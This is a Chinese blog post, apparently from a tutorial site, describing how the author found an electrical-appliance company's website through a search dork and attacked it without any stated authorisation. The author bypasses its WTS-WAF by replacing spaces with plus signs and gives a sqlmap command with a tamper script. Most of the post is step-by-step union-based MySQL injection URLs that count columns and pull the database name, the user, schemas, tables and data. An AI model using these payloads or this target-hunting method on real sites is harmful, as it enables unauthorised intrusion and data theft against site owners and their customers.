如何進(jìn)行繞過(guò)WTS-WAF的分析

3610

0x01.尋找目標(biāo)

inurl:.php?id= intext:電器

找到了一個(gè)電器公司的網(wǎng)站,隨便測(cè)了測(cè),發(fā)現(xiàn)有waf

如何進(jìn)行繞過(guò)WTS-WAF的分析

如何進(jìn)行繞過(guò)WTS-WAF的分析

這還不安排(找了點(diǎn)資料,貌似直接加號(hào)代替空格就可以,直接嘗試)

0x02.操作

如何進(jìn)行繞過(guò)WTS-WAF的分析

發(fā)現(xiàn)沒(méi)有waf攔截了

資料還說(shuō)了

sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py

工具我嘗試了發(fā)現(xiàn)無(wú)法開(kāi)始

就這樣子……

如何進(jìn)行繞過(guò)WTS-WAF的分析

0x03.手注

http://*/*.php?id=1+and+1=1  #回顯正常 http://*/*.php?id=1+and+1=2  #回顯錯(cuò)誤 說(shuō)明存在注入  http://*/*.php?id=1+order+by+15  #15回顯錯(cuò)誤 http://*/*.php?id=1+order+by+14  #14回顯正常 說(shuō)明有14個(gè)字段  http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14  #-1讓它錯(cuò)誤然后執(zhí)行后面

如何進(jìn)行繞過(guò)WTS-WAF的分析

它回顯了第2和第8

http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14  #查詢當(dāng)前數(shù)據(jù)庫(kù)信息和當(dāng)前用戶 一些常見(jiàn)的函數(shù) version()  #顯示數(shù)據(jù)庫(kù)當(dāng)前版本 database() / schema()  #顯示當(dāng)前數(shù)據(jù)庫(kù)名 user() / system_user() / session_user() / current_user() / current_user()  #顯示當(dāng)前用戶名稱 charset(str)  #返回字符串str的字符集 collation(str)  #返回字符串str的字符排列方式

0x04.查數(shù)據(jù)

爆數(shù)據(jù)庫(kù)

http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1

如何進(jìn)行繞過(guò)WTS-WAF的分析

它不能group_concat,那我就一個(gè)一個(gè)查了! http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #從1開(kāi)始取一個(gè) http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1  #從2開(kāi)始取一個(gè)

爆數(shù)據(jù)表

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

如何進(jìn)行繞過(guò)WTS-WAF的分析

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

爆數(shù)據(jù)

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1

總結(jié):

1.工具跑不起就只能手注了

2.實(shí)踐了下mysql的手注

? 版權(quán)聲明
THE END
互聯(lián)網(wǎng)運(yùn)維
# 數(shù)據(jù)庫(kù)# mysql
喜歡就支持一下吧
點(diǎn)贊10 分享
站長(zhǎng)的頭像-小浪學(xué)習(xí)網(wǎng)月度會(huì)員